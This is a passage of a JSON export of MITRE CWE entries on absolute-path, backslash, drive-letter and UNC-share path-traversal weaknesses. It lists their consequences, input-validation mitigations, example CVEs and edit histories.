the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1345","Description":"Multiple FTP clients write arbitrary files via absolute paths in server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345"},{"Reference":"CVE-2001-1269","Description":"ZIP file extractor allows full path","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269"},{"Reference":"CVE-2002-1818","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818"},{"Reference":"CVE-2002-1913","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913"},{"Reference":"CVE-2005-2147","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147"},{"Reference":"CVE-2000-0614","Description":"Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614"},{"Reference":"CVE-1999-1263","Description":"Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263"},{"Reference":"CVE-2003-0753","Description":"Remote attackers can read arbitrary files via a full pathname to the target file in config parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753"},{"Reference":"CVE-2002-1525","Description":"Remote attackers can read arbitrary files via an absolute pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525"},{"Reference":"CVE-2001-0038","Description":"Remote attackers can read arbitrary files by specifying the drive letter in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038"},{"Reference":"CVE-2001-0255","Description":"FTP server allows remote attackers to list arbitrary directories by using the \\"ls\\" command and including the drive letter name (e.g. C:) in the requested pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255"},{"Reference":"CVE-2001-0933","Description":"FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933"},{"Reference":"CVE-2002-0466","Description":"Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466"},{"Reference":"CVE-2002-1483","Description":"Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form \\"C:\\" (Drive letter), \\"//absolute/path\\", or \\"..\\" .","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-2004-2488","Description":"FTP server read/access arbitrary files using \\"C:\\\\\\" filenames","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488"},{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\\\\\\\computername\\\\sharename).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Absolute Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"597"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Filenames and Paths&#34;, Page 503"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"37":{"attr":{"@_ID":"37","@_Name":"Path Traversal: \'/absolute/pathname/here\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A software system that accepts input in the form of a slash absolute path (\'/absolute/pathname/here\') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"160","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1345","Description":"Multiple FTP clients write arbitrary files via absolute paths in server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345"},{"Reference":"CVE-2001-1269","Description":"ZIP file extractor allows full path","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269"},{"Reference":"CVE-2002-1818","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818"},{"Reference":"CVE-2002-1913","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913"},{"Reference":"CVE-2005-2147","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147"},{"Reference":"CVE-2000-0614","Description":"Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/absolute/pathname/here"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Slash Absolute Path - /absolute/pathname/here","attr":{"@_Date":"2008-04-11"}}}},"38":{"attr":{"@_ID":"38","@_Name":"Path Traversal: \'\\\\absolute\\\\pathname\\\\here\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A software system that accepts input in the form of a backslash absolute path (\'\\\\absolute\\\\pathname\\\\here\') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1263","Description":"Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263"},{"Reference":"CVE-2003-0753","Description":"Remote attackers can read arbitrary files via a full pathname to the target file in config parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753"},{"Reference":"CVE-2002-1525","Description":"Remote attackers can read arbitrary files via an absolute pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\\\\absolute\\\\pathname\\\\here (\'backslash absolute path\')"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Backslash Absolute Path - \\\\absolute\\\\pathname\\\\here","attr":{"@_Date":"2008-04-11"}}}},"39":{"attr":{"@_ID":"39","@_Name":"Path Traversal: \'C:dirname\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An attacker can inject a drive letter or Windows volume letter (\'C:dirname\') into a software system to potentially redirect access to an unintended location or arbitrary file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0038","Description":"Remote attackers can read arbitrary files by specifying the drive letter in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038"},{"Reference":"CVE-2001-0255","Description":"FTP server allows remote attackers to list arbitrary directories by using the \\"ls\\" command and including the drive letter name (e.g. C:) in the requested pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255"},{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged system information by specifying arbitrary paths.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"},{"Reference":"CVE-2001-0933","Description":"FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933"},{"Reference":"CVE-2002-0466","Description":"Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466"},{"Reference":"CVE-2002-1483","Description":"Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form \\"C:\\" (Drive letter), \\"//absolute/path\\", or \\"..\\" .","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-2004-2488","Description":"FTP server read/access arbitrary files using \\"C:\\\\\\" filenames","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'C:dirname\' or C: (Windows volume or \'drive letter\')"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Drive Letter or Windows Volume - \'C:dirname\'","attr":{"@_Date":"2008-04-11"}}}},"40":{"attr":{"@_ID":"40","@_Name":"Path Traversal: \'\\\\\\\\UNC\\\\share\\\\name\\\\\' (Windows UNC Share)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An attacker can inject a Windows UNC share (\'\\\\\\\\UNC\\\\share\\\\name\') into a software system to potentially redirect access to an unintended location or arbitrary file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\\\\\\\computername\\\\sharename).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'\\\\\\\\UNC\\\\share\\\\name\\\\\' (Windows UNC share)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path 